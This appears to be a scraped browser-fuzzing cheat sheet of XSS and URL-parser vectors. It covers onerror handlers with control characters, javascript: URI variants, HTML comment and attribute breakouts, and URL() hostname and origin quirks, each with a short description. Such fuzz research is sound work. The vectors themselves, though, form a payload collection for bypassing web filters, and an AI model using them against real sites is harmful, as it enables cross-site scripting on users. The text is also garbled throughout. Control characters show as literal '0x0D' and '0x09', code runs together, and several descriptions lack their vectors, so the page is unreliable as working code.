Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 177 vectors with results
if (new URL("https://example.com" + String.fromCodePoint(9) + "/").hostname === 'example.com'){alert(9)}Checks what characters can be added between "https://example.com" and /, while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(10) + "/").hostname === 'example.com'){alert(10)}Checks what characters can be added between "https://example.com" and /, while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(13) + "/").hostname === 'example.com'){alert(13)}Checks what characters can be added between "https://example.com" and /, while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(35) + "/").hostname === 'example.com'){alert(35)}Checks what characters can be added between "https://example.com" and /, while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(47) + "/").hostname === 'example.com'){alert(47)}Checks what characters can be added between "https://example.com" and /, while keeping the hostname "example.com"
(new URL("https:" + String.fromCodePoint(0) + "example.com","https://shazzer.co.uk").origin === new URL("https://shazzer.co.uk").origin) && (new URL("https:" + String.fromCodePoint(0) + "example.com").origin === new URL("https://example.com").origin) && alert(0 + " >> " + String.fromCodePoint(0))0x0D
0x0D
Characters that cause URL() to treat the provided url as a relative url when a base is used, and as an absolute url when no base is used. Based on the writeup: https://blog.vitorfalcao.com/posts/intigriti-0525-writeup/#checks-vs-usage-a-subtle-difference
if (new URL("https://example" + String.fromCharCode(i) + "com").host == "example.com") alert(i)char = String.fromCodePoint(60)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(60)}0x0D
}char = String.fromCodePoint(62)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(62)}0x0D
}char = String.fromCodePoint(64)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(64)}0x0D
}char = String.fromCodePoint(91)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(91)}0x0D
}char = String.fromCodePoint(92)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(92)}0x0D
}try { v = "javasc$ript$:(1)"; if (eval(v)) { console.alert(v); alert('36') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
try { v = "javasc_ript_:(1)"; if (eval(v)) { console.alert(v); alert('95') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
try { v = "javascªriptª:(1)"; if (eval(v)) { console.alert(v); alert('170') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
try { v = "javascµriptµ:(1)"; if (eval(v)) { console.alert(v); alert('181') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
<img src=x onerror0x09=alert(9)>I want to know which characters the browser accepts between an event handler and a equal sign.
I want to know which characters the browser accepts between an event handler and a equal sign.
<img src=x onerror0x0C=alert(12)>I want to know which characters the browser accepts between an event handler and a equal sign.
<img src=x onerror0x0D=alert(13)>I want to know which characters the browser accepts between an event handler and a equal sign.
I want to know which characters the browser accepts between an event handler and a equal sign.
<a href="javascript0x09:" id=x></a>This tests for chars allowed before the colon in a Javascript uri format.
<a href="javascript
:" id=x></a><a href="javascript0x0D:" id=x></a>This tests for chars allowed before the colon in a Javascript uri format.
<a href="javascript::" id=x></a>if (new URL("https://example.com" + String.fromCodePoint(0)).hostname === 'example.com'){alert(0)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(1)).hostname === 'example.com'){alert(1)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(2)).hostname === 'example.com'){alert(2)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(3)).hostname === 'example.com'){alert(3)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(4)).hostname === 'example.com'){alert(4)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
<! <a/b="--><img/src/onerror=alert(1)>"This vector shows which characters can be used after the "<" character and act as an HTML comment
</ <a/b="--><img/src/onerror=alert(1)>"This vector shows which characters can be used after the "<" character and act as an HTML comment
<? <a/b="--><img/src/onerror=alert(1)>"This vector shows which characters can be used after the "<" character and act as an HTML comment
if (new URL("https://google.com0x090x09/endpoint").origin=="https://google.com"){alert(9)}Characters ignored in URL, which yield in the same Origin
if (new URL("https://google.com##/endpoint").origin=="https://google.com"){alert(35)}if (new URL("https://google.com///endpoint").origin=="https://google.com"){alert(47)}if (new URL("https://google.com??/endpoint").origin=="https://google.com"){alert(63)}if (new URL("https://google.com\\/endpoint").origin=="https://google.com"){alert(92)}<p><img/src/onerror=alert(1)></p>Looking for potentially a way to bypass the removal of < tags. (assume the <p> tags are being returned by the application)
if (new URL("javascript0x09:alert()").protocol=="javascript:"){alert(9)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
if (new URL("javascript::alert()").protocol=="javascript:"){alert(58)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
if (new URL("javascript\:alert()").protocol=="javascript:"){alert(92)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
<input id="test" value="s0x00onload="alert(1)" />Characters that can break out of an inline value with double quotes
if (['https:'].includes("\https:")){0x0D
alert(92)0x0D
}Check for chars allowed before the string to validate.
Characters that can be replace opening angle bracket and still form a valid HTML element
<img src=x><img/src/onerror=alert(1)>Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.